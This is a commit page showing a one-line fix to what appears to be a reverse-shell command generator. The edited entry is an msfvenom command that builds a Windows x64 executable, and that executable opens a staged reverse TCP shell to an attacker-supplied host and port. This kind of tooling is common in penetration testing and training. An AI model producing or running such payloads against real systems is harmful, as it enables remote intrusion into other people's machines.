Merge pull request #91 from egglessness/main

Fixed Windows Staged Reverse TCP (x64)
This commit is contained in:
Ryan Montgomery 2022-06-01 09:43:35 -04:00 committed by GitHub
commit 045a40e3ca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -355,7 +355,7 @@ const msfvenomCommands = withCommandType(
},
{
"name": "Windows Staged Reverse TCP (x64)",
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"command": "msfvenom -p windows/x64/shell/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
},
{